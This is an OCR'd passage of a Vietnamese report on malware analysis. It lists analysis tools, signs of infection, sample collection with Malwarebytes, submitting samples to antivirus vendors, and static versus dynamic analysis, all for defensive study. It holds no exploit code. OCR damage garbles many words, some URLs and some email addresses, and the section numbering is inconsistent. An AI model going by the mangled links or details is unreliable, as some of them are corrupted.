p> Resume this virtual machine 
CH Edit virtual machine settings 


[d Processors 1 

@ Hard Disk (SCS) 8GB 

=) CD/DVD (IDE) Auto detect 
H Floppy Auto detect 
fa Network Adapter Bridged 
USB Controller Present 

$$) Sound Card Auto detect 
(Display Auto detect 


v Description 
Type here to enter a description of this 
virtual machine. 


v Virtual Machine Details 
State: Suspended 
Configuration file: C:\Users\Amit\Documents\Virtual 
Machines\Windows XP 
Professional\Windows XP 


Vmware: http://www.vmware.com 


Oracle VM VirtualBox Manager 


Machine 
(9 Details [Œ Snapshots (1)) 


= @ Snapshot 1 (14/09/11 5:44 AM) 
B current State 


Virtual box: http://virtualbox.org 
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3.1.3.2 Các phan mém hỗ trợ phân tích 


a) Phần mềm lập trình 


Dev C++ - http://www.bloodshed.net/devcpp.html 


Microsoft Visual C++ - 


http://www.microsoft.com/visualstudio/en-us/products/2010- 
editions/visual-cpp-express 


Assemblers: 
MASM - http://www.masm32.com/ 
NASM - http://www.nasm.us/ 
WinAsm (IDE) - http://www.winasm.net/ 

Langugages: 
Python - http://python.org/ 

b) Phan mềm phân tích 
Dịch ngược mã nguồn 


IDA (5.0) - http://www.hex- 
rays.com/products/ida/support/download.shtml 


IDAPython - http://code.google.com/p/idapython/ 
Phan mềm dò lỗi (Debugger) 


OllyDbg - http://www.ollydbg.de/ 


Immunity Debugger - 
http://immunityinc.com/products-immdbg.shtml 


Windbg - http://msdn.microsoft.com/en- 
us/windows/hardware/gg463009 


Pydbg - http://code.google.com/p/paimei/ 
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Phan mém xem dinh dang PE file 


PEView - http://www.magma.ca/~wijr/ 


PEBrowse - 


http://www.smidgeonsoft.prohosting.com/pebrowse- 
pro-file-viewer.html 


LordPE - 


http://www.woodmann.com/collaborative/tools/index. 
php/LordPE 


ImpRec - 
http://www.woodmann.com/collaborative/tools/index. 
php/ImpREC 


PEid - http://www.peid.info/ vi. ExeScan - 
http://securityxploded.com/exe-scan.php 


Phan mêm kiêm tra tiên trinh Process 


ProcMon - http://technet.microsoft.com/en- 
us/sysinternals/bb896645 


Process Explorer - http://technet.microsoft.com/en- 
us/sysinternals/bb896653 


Phan mềm bắt gói tin trong mang 
WireShark - http://www.wireshark.org/ 


TcpView - http://technet.microsoft.com/en- 
us/sysinternals/bb897437 


Phan mềm theo dõi sự thay đổi của file va registry 
Regshot: http://sourceforge.net/projects/regshot/ 


Capturebat - http://www.honeynet.org/node/315 


InstallWatchPro. - 


http://www.brothersoft.com/downloads/installwatch- 
pro-2.5c.html 


FileMon - http://technet.microsoft.com/en- 
us/sysinternals/bb896642 


Cac phan mém khac 
CFFexplorer - http://www.ntcore.com/exsuite.php 


Notepad++ - http://notepad-plus-plus.org/ 


Dependency walker - 
http://www.dependencywalker.com/ 


Sysinternal Tools - http://technet.microsoft.com/en- 
us/sysinternals/bb842062 


3.3 Quy trình phân tích và xử lý mẫu mã độc hai 


Công việc phân tích mã độc cân có quy trình cụ thê và rõ ràng, điêu này 


giup giảm thiêu hạn chê rủi ro. 


Trong quy trình xử lý mã độc hại bao gồm rất nhiều bước 


3.3.1 Nhận diện hệ thống bị nhiễm mã độc hại và khoanh vùng xử lý 


a. Phát hiện ra sự cô hệ thông bị nhiễm mã độc hại là bước quan trọng 


nhất trong quy trình xử lý. Nếu hệ thống bị nhiễm mã độc hại mà không 


phát hiện sớm thì có thể gây ra hậu quả khó lường. 


Có rat nhiều dau hiệu cho biết một hệ thông bị nhiễm mã độc hại, dưới 


đây là một vài dấu hiệu thường thấy: 


Dau hiệu nhiém Virus : 


Hệ thống tự động shutdown hoặc logging off đột ngột. 

Hệ thống có ít bộ nhớ hơn bình thường. 

Tên một 6 đĩa bi thay đôi hay không có thé truy cập được vào. 

Các chương trình và các file đột nhiên không truy cập được vảo( ví 
dụ Task manager, Registry Editor, Folder Options). 

Các chương trình hoặc file lạ được tao ra. 

Lưu lượng mạng trong hệ thống tăng cao. 

Dấu hiệu nhiễm Trojan : 

Màn hình tự dưng có gợn sóng. 

Wall-paper của máy bi thay đổi. 
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- Mau sắc cửa số Windows bị thay đôi. 

- Chúc năng chuột trái, chuột phải bị hoán đôi vị trí lẫn nhau. 
- Con trỏ chuột không xuất hiện, tự di chuyên 

- Nút Windows Start không xuất hiện. 

- Thanh Taskbar tự dưng không xuất hiện. 

- Máy tính bạn tự dung shutdown hoặc tự tắt. 


Dấu hiệu nhiễm Spyware 

- Trang web mặc định tự động thay đôi. 

- Firewall và các chương trình Anti-Virus tự động tắt. 

- Dén báo mạng nhấp nháy nhiều. 

- Không thé tắt được hết các popup windows nhảy ra. 

- Chuong trình mới tự động trong mục Add/remove Program 

- Có 1 vài icon và shortcuts lạ năm trên thanh taskbar của bạn, system 
tray hoặc trên desktop của bạn. 

- Nguu chuyên tới 1 một trang lạ thay vì lỗ 404, khi trang web không 
tìm thấy. 

- Ban nhận cảnh báo liên tục từ firewall về một chương trình không 
rõ ràng hoặc một tiến trinh nao đó có gắng truy cập ra Internet. 

- Ban nhận được một số email quay trở lại hoặc nhìn thay có một số 
email tự gửi di. 

- Trinh duyệt web của bạn chạy chậm hơn so với bình thường. 


- Có thanh toolbar xuất hiện lạ thường trên web-browser 


Trên đây là những dấu hiệu thường thấy khi máy tính bị nhiễm 
mã độc hại. Ngoài ra có thể tham khảo thêm các dấu hiệu khác tại các 
trang web về bảo mật, về mã độc hại. 

b. Sau khi nhận diện được hệ thống bị nhiễm mã độc hại cần phải : 
- Khoanh vùng xử lý (cách ly các máy có dấu hiệu nghi ngờ nhiễm mã 
độc hại). 
- Ghi lại ngày giờ phát hiện mã độc hại và các thông tin liên quan. 
- Dé nguyên tình trạng của phần cứng, phần mềm liên quan đến hệ thống 
bị nhiễm. 
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- Xác định hệ thống bị nhiễm mã độc hai : 
Thông tin vé hệ điều hành dang sử dụng. 
* Trình duyệt Web. 

* Firewall. 

* Các trinh báo vé máy hién thoi dà có. 

Tir dó ta xác dinh duoc các modules, các tién trinh, các dich vu, các 
drivers, các add-on trình duyệt, phiên bàn hệ điều hành ... của hệ thống 
có liên quan đến hoạt động của mã độc hại. Mục đích thu thập thông tin 
dé sau này có thé xác định nguón gốc lây lan và tại sao lại bị nhiễm 
thông qua đâu? Đồng thời cũng rà soát lại một lượt xem hệ thống mình 
có bị lỗi bảo mật nào không. 

Trên đây là những hành động người quản trị cần làm ngay khi hệ thống 
bị nhiễm mã độc hại. Thường thì người phân tích mã độc hại chỉ nhận 
được mẫu rồi thực hiện phân tích. Tuy nhiên đứng ở góc độ người làm 
an toàn thông tin hay một quản trị mạng hệ thống thì việc xử lý tốt các 
bước ban dau sẽ giúp ich công việc khác phục sự có tốt hơn. 

3.2.2 Thu thập mẫu mã độc hại 

Thu thập mẫu virus, mã độc là quá trình tim ra các file nhiễm virus, các 

file nghi ngờ nhiễm virus trong hệ thống nhằm mục đích nghiên cứu, 

phân tích và học hỏi 

Thường có rất nhiều cách để có thể thu thập mẫu, trong đồ án này 
không nêu các phương pháp dé có thé lay được mã độc hại một cách 
chuyên nghiệp như xây dựng hệ thống honeypot giống một số hãng phần 
mềm diệt virus.... Hoặc lay mau từ khách hang tự gửi đến, từ các nguồn 
chia sẻ trên mạng, mua từ các hang nghiên cứu bảo mát.... 

Nếu muốn tham khảo về honeypot thu thập mã độc hại thì có thể 
tham khảo các ứng dụng thu thập mã độc hại như : 
http://www.honeyclient.org/trac 
http://nepenthes.carnivore.it/ 
http://sourceforge.net/projects/amunhoney/ 

Ở đây ta đứng ở vài trò là một system admin. Việc tự minh thu thập 
được mã độc hại trên chính hệ thống đòi hỏi nhiều kinh nghiệm, ví dụ 
thấy có các file thực thi lạ trên hệ thống thì nén nó lại băng trình nén file 
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va đặt mật khâu sau đó mang đi phân tích. Hoặc dùng một só cóng cu 
giám sát hé thóng nhu process dé xem có tién trinh nào la khóng, tim 
cách xem cái nào tao ra tién trinh la dé rói xác dinh nó nam 6 dau, nén 
nó lai mang di phan tích. 

Ví du : Mót má dóc hai khá nói tiéng Rbot, thuóng str dung 
trong các cuóc tán cóng DDoS, nó là sé tu dóng mó 1 port unprivilege 
trên máy nạn nhân, tham gia vào một kênh trên IRC và nghe lệnh từ kẻ 
tấn công. Từ dấu hiệu lưu lượng mạng tăng bất thường, ta dùng một số 
phần mềm kiểm tra về tién trinh và có găng xác định con rbot đó nam ở 
đâu. Sau đó lay mẫu và mang di phân tích. 

Ngoài ra có 1 chương trình khá nói tiếng của hãng Trenmicro là phan 
mềm Sicwin. 
http://www.trendmicro.com/ftp/products/sic/SIC_5.5_build_1017.zip 
Phan mềm nay sẽ quét hệ thống va đưa ra các thông tin về hệ thống, các 
thông tin về các file dll lạ do mã độc hại sinh ra , các file exe khả nghĩ, 
sau đó sẽ nén chúng lại thành file zip, chúng ta chỉ cần mang file zip đó 
đi phân tích. 

Bên cạnh đó người phân tích có thể sử dụng chương trình 

Malwarebytes Anti-Malware để tìm các mẫu hiện thời có trên máy, 

chương trình ngoài kha năng phát hiện mã độc, còn có thé chỉ ra các 

file nghi ngờ và cả đường dẫn của file đó, điều này giúp quá trình thu 
thập mẫu thuận lợi hơn. 

MBAM - Malwarebytes Anti-Malware là phần mềm diệt Virus, 

Malware mà theo nhiều người nhận xét là có cơ ché tìm và diệt virus rất 

thông minh (đặc biệt đối với các loại Malware mới xuất hiện của Châu 

Âu, Mỹ...). 

Nhờ khả năng phân tích thông minh dé phát hiện các file lây nhiễm, các 


file nghi ngờ mà MBAM được sử dụng làm công cụ lay mau virus rất 
hiệu quả. 


Các sử dụng chương trình này không phức tạp, người phân tích thực 
hiện những bước như sau đối với phần mềm này để lấy mẫu mã độc. 
Tải chương trình tabi đây: http://download.cnet.com/3001-8022 4- 


10804572. html ?spi=26f02dc7e2587a24758db83309d182£5 
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Bước 1: Người phân tích thực hiện Perform full sacn (quét toàn bộ 


máy) rôi ân Scan 


Malwarebytes’ 


Scanner Protection Update Quarantine Logs Ignore List Settings More Tools About 


ì Scanner 
Ay Í The scanner can find and remove malicious software present on your system. Please select a scan type and click ‘Scan’. Please close 
J all unnecessary applications to improve scan performance. 


Please select a scan type below. 


© Perform quick scan 
À quick scan utilizes our unrsque fast scanning technology to scan your system for malicious software, 


© Perform full scan 
À full scan will scan all filles on the selected drive(s). & quick scan is recommended m most cases. 


© Perform flash scan 
À flash scan wil analyze memory and autorun objects. It is only available to our licensed users. 


Hinh 3-9 Giao dién chuong trinh 


Bước 2 : Sau khi quét xong, người phân tích ấn Ok va ấn Show result ( hiện 


được kêt quả như sau: 
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` ` 
` b 


d 


‘Malwarebytes’ 


Protection Update | Quarantine | Logs | Joore Lt Settings | More Tools About 


Scanner 
' 7 | Below is a list of malicious software found on your system. Close all unnecessary applicalions to ensure successful threat removal. 


Vendor Category Item Dther Action taken 
[v] Y& Trojan.Agent Foldet e\RECYCLER\s-1-5-21 -0243936033-305211... No action taken. 
WE Trojan.Agent Fie ce \RECYCLER \s-1-5-21-0243936033-30521 1... No action taken. 
EF Trojan.Agent Fie e\RECYCLER \s-1 -5-21 -0243936033-306211... No action taken. 
WE WormAutoRun Folder c ARECYCLERSe-1-5-21:0243556031-889998... No action taken. 
WE Worm.AutoRun c ARECYCLERNe-1-5-21-0243556031-899888. No action taken. 
E Worm.AutoRun c:\RECYCLER\3-1-5-21-0243556021-888868 No action taken 
Worm.AutoRu... €\RECYCLERV-1-5-21-1482476501-164443.. No action taken 
Worm.AutoRu.. Fie e\RECYCLERY 1-5-2 5501-164443 No action taker 
WE VWorm.AutoRu... e\RECYCLER\-1-5-21-1482476501 164449... No action taken. 
KC? PUM.Disabied.... Registry Data HKEY_LOCAL_MACHINE\SOFTWARE Mics... Bad (1) Good (0) No action taken. 


Remove Selected 


Hinh 3-10 : Giao dién két qua 


Bước 3 Người thu thập nhìn hình trên sẽ biết được tên virus đã nhiễm 


vào máy. Nhưng đê nhìn rõ hơn virus năm ở đường dân nào của máy hãy 


an nút Save log, khi đó có hình sau hiện ra như sau: 
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| (2} Desktop 


r- B My Documents 

CJ d My Computer 

Recent omy Network Places 

(C3102, PANA 

(5 MicrosoftFixits0154 
()Pikachu_tong_hop_Rilwis.tk 
(Google Talk Received Files 


Desktop 
EI mbam-log-201 1-03-17 (23-33-27).tx 


My Documents 


5 


My Computer 


File name: ‘mbarn-log-2011-04-12 (11-21-21) 4 vị 


a) Save as type: Text File " | 


My Network 


Hinh 3-11: Giao dién ghi nhát ky 

Người thu thập chon Destop dé luu (save) log của Mbam bang 
notepad. Trong hinh tên file log của MBAM trên máy :mbam - log-2011- 
04-12.txt. 

Đến đây người thu thập dà hoàn thành việc luu log Mbam có chứa 
đường dan virus lây nhiễm nam trên destop của máy rồi. Lúc này dé gom 
mau, người dùng không được ấn nút Remove trên giao diện vừa quét của 
MBAM vì nếu nhẫn nút đó, mẫu virus sẽ mát do MBAM tiêu diệt (sẽ 
không lấy được mẫu). Người thu thập làm theo bước 5 như sau: 

Bước 5: Gom mẫu 

Người thu thập chỉ việc ra Desktop mở file log MBAM lên để xem 
đường dẫn. Máy duymeo khi mở sẽ có log của MBAM như sau: (Trích 
đoạn log): 


Malwarebytes' Anti-Malware 1.50.1.1100 


www.malwarebytes.org 
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Database version: 6339 


Windows 5.1.2600 Service Pack 2 


Internet Explorer 6.0.2900.2180 


4/12/2011 11:22:32 AM 


mbam-log-201 1-04-12 (11-22-31). txt 


Scan type: Full scan (CAJD:V) 
Objects scanned: 152233 


Time elapsed: 23 minute(s), 42 second(s) 


Memory Processes Infected: 0 
Memory Modules Infected: 0 
Registry Keys Infected: 0 
Registry Values Infected: 0 
Registry Data Items Infected: 1 
Folders Infected: 3 


Files Infected: 6 


Memory Processes Infected: 


(No malicious items detected) 


Memory Modules Infected: 


(No malicious items detected) 


Registry Keys Infected: 


109 


(No malicious items detected) 


Registry Values Infected: 


(No malicious items detected) 


Registry Data Items Infected: 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify 


(PUM.Disabled.SecurityCenter) -> Bad: (1) Good: (0) -> No action taken. 


Folders Infected: 

c:\RECYCLER\s-1-5-21-0243936033-30521 1637 1-381863308-1811 (Trojan.Agent) -> No action 
taken. 

c:\RECYCLER(\s-1-5-21-0243556031 -888888379-781863308-1413 (Worm.AutoRun) -> No action 
taken. 

c:\RECYCLER\r-1-5-21-1482476501-1644491937-682003330-1013 (Worm.AutoRun.Gen) -> No 


action taken. 


Files Infected: 

c:\RECYCLER\s-1-5-21-0243936033-30521 1637 1-381863308-1811\Desktop.ini (Trojan.Agent) -> No 
action taken. 

c:\RECYCLER\s-1-5-21-0243936033-30521 1637 1-381863308-1811\Desktop3.rar (Trojan.Agent) -> 
No action taken. 

c:\RECYCLER\s-1-5-21-0243556031-888888379-781863308-1413\Desktop.ini (Worm.AutoRun) -> 
No action taken. 

c:\RECYCLER\s-1-5-21-0243556031-888888379-781863308-1413\Desktop2.rar (Worm.AutoRun) -> 


No action taken. 
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cRECYCLERYr-1-5-21-1482476501-1644491937-682003330-1013\Desktop.ini 
(Worm.AutoRun.Gen) -> No action taken. 
c:\RECYCLER\r-1-5-21-1482476501-1644491937-682003330-1013\Desktop.rar 
(Worm.AutoRun.Gen) -> No action taken. 
Nhìn vào một số đường dẫn bôi đỏ, người thu thấp sẽ thay virus trú ngụ 
ở vi trí nào trên may. 

Lúc này người thu thập chỉ cần dùng winrar nén lên và gửi lên forum là 
xong. 

Cách nén bang winrar: Khi biết đường dẫn của virus trú ngụ, chang hạn 
trên máy tính là con file.exe lây tại đường dan C:\Documents and 
Settings\Nguyen Van A\file.exe 

thì chi việc vào 6 C, theo đường dẫn đó nhấp phải chuột vao file file.exe 
rồi chọn add to "file.rar" đây là người thu thập đã nén được mẫu bằng 
winrar. 

3.2.2 Giri mau dén cac hang Anti-virus 

Sau khi thu thập được mẫu mã độc trên máy tính, hệ thong, người phân 
tích thu thâp ngoài việc tự phân tích và xử lý mẫu mà độc còn nên gửi 
mẫu mã độc đó cho các tổ chức, cho các công ty Antivirus. Điều này 
giúp các hãng có thê cập nhật được mẫu mới. Hầu hết các hãng Antivirus 
đều có riêng một phan thông tin Website để cho người dùng có thé gửi 


mâu lên. 
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EK o VirusTotal -Dich vu quét vin x Œ. ell]. 3% 
> Œ BB https://www.virustotal.com/vi/ Tùy chinh và điều khiến Cờ Róm-- ay 


[| Suggested Sites (7 CONA ver 4 


pe total 


VirusTotal là dịch vụ miễn phí, giúp phân tích tập tin va URL nghi ngờ va tao điều 
kiện cho việc nhanh chóng phát hiện virus, sâu máy tính, trojan và tất cả các loại phần 
mém độc hại khác 


Chưa chọn tập tin Chọn tập tin 
Kích thước tập tin tối đa: 64MB 


Bằng việc chọn nút 'Quétf, bạn đồng ý với Điều khoăn dịch vụ của chúng tôi và cho phép VirusTotal 
chia sẽ tập tin nay với công đông bao mật. Xem qua Chính sách riêng tu dé biết thêm chỉ tiết 


Có thé ban cán quét URL hoặc tìm trong cơ sở dữ liệu của VirusTotal 


A Blog | Y Twitter | Bá contact@virustotal.com | $$$ Nhóm Google | & Điều khoăn dịch vụ | Chính sách riêng tư 


Hinh 2-12: VirusTotal 


http://www.techsupportalert.com/content/how-report-malware-or-false- 


ositives-multiple-antivirus-vendors.htm 
3.2.2.1 Gửi bang email 


Sau khi người thu thập đã có mẫu, các bước để gửi cho các hãng 


Antivirus như sau: 


Bước 1: Sử dụng một mail client khuyến cáo sử dụng 
Thunderbird,Outlook. 
Bước 2: Sử dung một chương trinh nén file, có thé sử dung 7-Zip đây 


là một phần mềm Free có thé đặt được mật khẩu sau khi nén file . 
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Hinh 3- 13: Chuong trinh 7-zip 


Một số hãng yêu cầu gửi mẫu mã độc sử dụng định dạng zip và kèm theo mật 
khâu, bên cạnh đó một số hãng thì gửi mẫu mã độc sử dụng định dạng 7z nên 
người thu thập nên sử dụng cả 2 định dạng để gửi mẫu. 

Gui email sử dụng định dang zip dạng như sau: 
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É Suspicious File Submission a GIE 


| File Edit View Insert Format Tools Message Help Li 
3| vil 9 j U.3 d ® 
Send cut Copy Peste Undo | Check Spelling | Attach Priority Sign Pot Offine 


GA To: 


lupport @clearsightav.com;malwaresubmit @aviab.comodo.com; virus &avsubmit.com;vms &drweb.com;malware @emcosoftware.com;submit @emsisoft.com; virus @esafe. Com Samples &escanav.c 
lom;submitvirus @fortinet, com;research @spy-emergency.com;viruslab @f-prot, com;labs @fsb-antivirus.com;vsamples f 
secure.com;virus @orbitech.org;samples Gikarus.at;submit @samples.immunet.com;k7viruslab @labs.k7computing.com;newvirus @kaspersky.com;support @jiangmin.com;research Glavasoft.com; x| 


Cc 


Subject: |Suspicious File Submission 


The sample is in a password protected zip file 


The password for the attachment is infected 


Hinh 3-14 : gửi email sử dung dinh dang zip 
Email là cüa các cóng ty vé mà dóc 


v3sos@ahnlab.com;virus@arcabit.com;virus@avast.com;virus@avg.co 
m;virus@avira.com;virus_submission@bitdefender.com;bkav@bkav.co 
m.vn;samples@bluepointsecurity.com;clearsight.support@clearsightav. 
com;malwaresubmit@avlab.comodo.com;virus@avsubmit.com;vms@d 
rweb.com;malware@emcosoftware.com;submit@emsisoft.com;virus@ 
esafe.com;samples@escanav.com;submitvirus@fortinet.com;research 
@spy-emergency.com;viruslab@f- 
prot.com;labs(@fsbantivirus.com;vsamples(@fsecure.com;virus@orbitec 
h.org;samples@ikarus.at;submit@samples.immunet.com;k7viruslab@ll 
abs.k7computing.com;newvirus@kaspersky.com;support@jiangmin.co 
m;research@lavasoft.com;virus_research@avertlabs.com;virus@micro 
point.com.cn;avsubmit@submit. microsoft.com; virus@nanoav.ru;soport 
e@neotechnology.com.mx;samples@eset.com;support@noralabs.com; 
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analysis@norman.no;newvirus@novirusthanks.org;virus_info@inca.co. 
kr;virus@pandasecurity.com;suporte@psafe.com;kefu@360.cn;support 
@rubus.co.in;newvirus@s- 
cop.com;samples@sophos.com;detections@spybot. info; viab@srnmicro 
.com;avsubmit@symantec.com;trojans@moosoft.com;virus@hacksoft. 
com.pe;virus@thirtyseven4.com;virus@ca.com;submit@trojanhunter.c 
om;support@simplysup.com;virus@filseclab.com;malware- 
cruncher@sunbelt-software.com;viruslab@hauri.co.kr;newvirus@anti- 
virus.by;esupport@webroot.com;virus@zillya.com;huangruimin@kings 
oft.com;lab@filemedic.com;pomoc@mks.com.pl 


Gui email định dạng 7z thì như sau: 


ais 
| Eile Edit View Insert Format Tools Message Help | ay 
— M = » AB | ra r¬ 
a | & O 1) AE 47 |0 Uae» 
Send Cut Copy Paste Und Check Spelling | Attach Priority Sign Encrypt Offline 
GAT: Suppor t.is@s .nets s @digi .com;sample @prev: ` suppor t-tech @returnil.com;info @chicalogic.com; @ 2 
GA cc: 


Subject: [Suspicious File Submission 


The sample is in a password protected 72 file 


The password for the attachment is infected 


Hình 3-15 : Giao diện gửi email 
Email của các công ty về mã độc sử dụng định dạng 


support.is 9 cmclab.net;samples @ digital- 
defender.com;sample ? preventon.com;support- 
tech @returnil.com;info ? chicalogic.com;submit @ antiy.com 


3.2.2.2 Gửi bang các trang trực tuyến 
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Hau hết các Website của các hang déu có khu vực cho phép gửi mau 
lên. Đây là một cách giúp các hãng AntiVirus có thêm mẫu mới. 


ER en - CB 


€ > Œ B https://submit.symantec.com/websubmit/retail.cgi as 
['1 Suggested Siter [C] CCNA ver 4 
[A] Trang này bằng | Tiếng Anh ~ | Ban có muốn dich trang này không? ` Dich | | Không | | Không bao gà dich Tiếng Anh Tùy chọn «| x 
(V Symantec. Close 
Upload a suspected infected file (Retail) English * 


Use the form below to upload a suspected infected file to Symantec Security Response. 
This submission form is intended for users of Norton products. 

You may also submit files directly from the product. 

If you are submitting a file you believe to be clean, please use this submission form. 


8 This submission form is SSL Secured. 
* Required fields are marked with an asterisk. 


First Name | s 
Last Name | * 
Company Name | 


Tracking and closing emails will be sent to the following email address: 
Email Address | * 
Re-enter Email Address | ^ 


File to Upload [Chon Tép tin | Không có tệp nào được chon * 


Symptoms 
Please describe the problem that leads you to believe this file is infected. 


Hinh 3-16 : Gửi mẫu lên trang Symatec 
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ERT on EA 


Œ | D www.bitdefender.com/ste/Defense/fieSubmission à qv 
1" Suggested Siter 7 CCNA ver 4 
A Trang này bằng Tiếng Anh » | Bạn có muốn dich trang nay không? | Dich | | Không | | Không bao gid dịch Tiếng Anh | uychony, * 


Bp — 


Bitdefender 


BITDEFENDER PRODUCTS 


> Home Products 


* Bitdefender for your Business Submit a suspicious file 


Please submit the suspicious file, together with a description of the simptoms your computer has. 
ABOUT BITDEFENDER Your email: 


* Company Overview 
> Technology 


> Bitdefender Partners 


Description: ⁄ 
Suspicious file”: Chon Tệp tin | Không có tệp nào được chon 
Submit 


www.bitdefender.com/Site/view/company.htmÌ EH 
Hình 3-17: Gửi mẫu lên trang Bitdefender 


= => Qq [5 samplesubmit.avg.com/ww-en/false-detection à Ye 
[5 Suggested Site" [^] CCNA ver 4 

[a] Trang này bằng ing Anh ~ | Bạn có muốn dich trang này không? | Dich | | Không | | Không bao giờ dịch Tiếng Anh Tùy chọn x|_ x 
fen =“———— fe x = = E = r| 


For Mobile Users 


æ If want to send a sample of an Android app that may be malware (not an app that was falsely detected), please visit the article Where can I send an 
A a le? 


For Software Vendors 


® In case you are a software vendor and you want to prevent your software from being falsely detected, please apply for the "Whitelisting service account" 
by choosing "Application Whitelisting" item from the form below. 


SUBMIT A REPORT 


* Required Fields 


Choose an appropriate request type * [— Choose from the list — - 


Details about the problem * 


File for inspection (Max 20MB) Chọn Tép tin | Không có tệp nào được chon 
URL [ 


Your email address * [ 


Verification code N 6 [e] (9 hx 


à ANOTHER CODE 
Type the verification code * I 


a 
Hình 3-18 Gửi mau lên trang AVG 


117 


ka gë Report a faise detection |a x Y QR Submit Suspicious Files x um. c» e |. 32 


CQ | (b htps://analysi.avira.com à 


Suggested Site: [^] CCNA ver 4 


LS a Trang này bang | Tiếng Anh ~ | Ban có muốn dịch trang này không? | Dich | | Không | | Không bao giờ dịch Tiếng Anh Tùy chọn ~ 
a 
For Home For Business Support Partner ^ Download Search Q 


Submit Suspicious Files and URLs 


Submit suspicious files 


Contact details 


Upload files as: 


e Suspicious File (Suspected Malware) Suspected False Positive (Not Malware) 


© Add files op ox 


Hinh 3-19: Giri mau lén trang Avira 
3.2.3 Phan tích mẫu sử dung một số phương pháp 
3.2.3.1 Phân tích thông tin sơ bó ma độc hai 
Người phân tích dự đoán đặc điểm, phân loại mã độc hại, chia dòng, 
đặt tên bằng cách xem mã hex, xem thuộc tính của file, kích thước file... 
hoặc thông tin đơn giản khác dé chúng ta tiến hành phân loại sơ bộ mã 
độc hại. 

Tìm kiếm thông tin: có thé upload mã độc hại lên các trang như Virus- 
total hoặc scan bằng các chương trình Anti-Virus xem chúng đã được 
nhận diện chưa. Nếu mã độc hại đã được nhận diện, chúng ta sẽ tìm kiếm 
thêm thông tin về mã độc hại đó làm cơ sở dé thực hiện việc phân tích 
chỉ tiết. 
3.2.3.2 Phân tích thông tin chỉ tiết hoạt động mã độc hại 

Hiện nay có 2 phuong pháp phân tích mã độc hai phó biến. Đó là 

- Phan tích tinh (static analysis) 

- Phan tích động (dynamic analysis) 
Cả 2 phương pháp đều rất quan trọng và đều có những ưu nhược điểm 
riêng 


a. Static analysis (phân tích tinh) 
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Static analysis là phương pháp xem mã dịch ngược để xác định những 
hành vi thực sự mã độc hại này sẽ làm gì trên hệ thống mà không cần 
phải chạy nó từ đó hiểu rõ hơn về hoạt động của mã độc hại. 

Phương pháp này thường sử dụng các công cụ: 
-  Disassembler 
- | Decompiler 

- Source code analyzer 

Uu diém phuong phap phan tich tinh: 

- Phan tích tinh có thé phát hiện ra hoạt động, cách hoạt động của 

mã độc trong các trường hợp khác nhau. 

- Static analysis sẽ cho chúng ta cái nhìn đúng nhất về một chương 
trình. Tuy nhiên rất khó khi chúng ta có thể nắm được toàn bộ 
hoạt động của một chương trình, trừ các chương trình có mã code 
nhỏ. 

Nhược điểm phương pháp phân tích tĩnh: 

e Phương pháp này đòi hỏi người phân tích phải am hiểu sâu về hệ thống 
và lập trình, không phải tất cả các mã độc hại đều có thể dịch nguoc. 
Hon nữa nhiều mã độc hai được lập trình tinh vi dùng nhiều chương 
trình bảo vệ dé chống dịch ngược mã vé dang assembly. 

b. Dynamic analysis (phân tích động) 

Dynamic analysis hay còn gọi là phân tích động là phương pháp quan 
sát xem mã độc hại khi thực thi sẽ làm những gì, chạy như thé nao, làm 
gì trên máy tính minh qua các công cụ monitor, cách nay có nhược điểm 
với các dòng mã độc hại chạy theo lịch trình. Nghiên cứu hoạt động của 
chương trình bằng cách thực thi chương trình đó. 

Phương pháp này thường sử dụng các công cụ: 

- Debugger 

- Function call tracer 

- Machine emulator 

- Logic analyzer 

- Network sniffer 


Uu nhược diém 
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Dynamic analysis cung cấp thông tin nhanh và chính xác. Tuy nhiên 
dynamic analysis có một nhược điểm là: "Những gì thấy được không 
phải là tất cả". Nói cách khác dynamic analysis không thể dự đoán được 
những hành vi của chương trình trong các điều kiện "đặc biệt" không tồn 
tại trong thực tế. Có thé lay ví dụ với các ma độc hai chạy theo thời gian, 
tức là ở thời điểm này nó hoạt động thời điểm khác nó lại không hoạt 
động. 

Mỗi phương pháp đều có một đặc điểm riêng nhưng khi phân tích mã 
độc hại thì người ta thường phải sử dung cả 2 phương pháp dé hỗ trợ lẫn 
nhau. 

Dù mục đích chính thì giống nhau nhưng các công cụ hỗ trợ việc phân 
tích, thời gian bỏ ra của từng phương pháp là khác nhau. 

2.2.4.1 Quan sát hành vi mã độc hại (Dynamic analysis) 

Như vậy ở trên đã nói qua 2 phương pháp được sử dụng dé phân tích mã 
độc hại thì phương pháp quan sát hành vi mã độc hại được dùng trước. 
Để quan sát hành vi mã độc hại này đòi hỏi thiết lập môi trường thử 
nghiệm: sử dụng máy ảo, sandbox, vitural PC để cho mã độc hại chạy. 
Nếu mã độc hại có cơ chế phát hiện môi trường ao thì phải sử dụng môi 
trường thật đã được giới hạn (trong LAN) đề thử nghiệm. Thiết lập mạng 
Internet, web, mail, cải đặt các hệ thống có lỗi nếu mã độc hại khai thác 
lỗi từ lỗi hệ thống. Môi trường thử nghiệm càng đây đủ, càng "thật" thì 
sẽ quan sát được càng nhiều đặc điểm của mã độc hại. Nếu xây dựng 
được hệ thống máy nhu máy bị nhiễm thì càng tốt. 

Thiết lập các công cụ giám sát: vì không thể quan sát virus bằng mắt 
nên trong môi trường thử nghiệm cần có các công cụ quan sát chuyên 
dụng như: 

File monitor. 

Registry monitor. 

Process monitor. 

Network monitor. 

Cac tool phat hién rootkit. 

Bộ công cụ nay sẽ giúp chúng ta quan sát mã độc hai tốt hơn. Bat dau 

chạy mã độc hại và quan sát các thông tin : 
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Khao sat processes xem có processes lạ nào đáng ngờ không? 

Khảo sát các modules dlls.... xem có gan vào các process hệ thong 

không? 

Khảo sát registry xem có process nào cùng khởi động với hệ điều hành 

có key nào được sinh ra và bị sửa däi không? 

Kiểm tra MD5, CRC, SHA các module (file) đang chạy trên hệ thống 

xem có bị mã độc hại gắn vào không? 

Khao sát các file, các thư mục án dé tìm các file nghi ngờ. 

Khảo sát các driver, tim rootkit làm án tiến trinh, án key. 

Khảo sát lưu lượng mạng xem có tăng đột ngột không? 

Kiểm tra xem các kết nói TCP/IP trên máy. 

Chạy mã độc hại và ghi log, quan sát cảng lâu kết quả càng chính xác. 

Thông thường mã độc hại sẽ được quan sát cho đến khi chúng không 
còn hoạt động gi đáng ké hoặc hành động lặp đi lặp lại. Việc ghi log chủ 
yếu do các công cụ monitor chuyên dụng ở trên thực hiện. 
2.2.4.2 Phân tích mã dịch ngược (Static analysis) 
Sau khi phân tích mã độc hại bằng cách quan sát hành vi ta sẽ thu được 
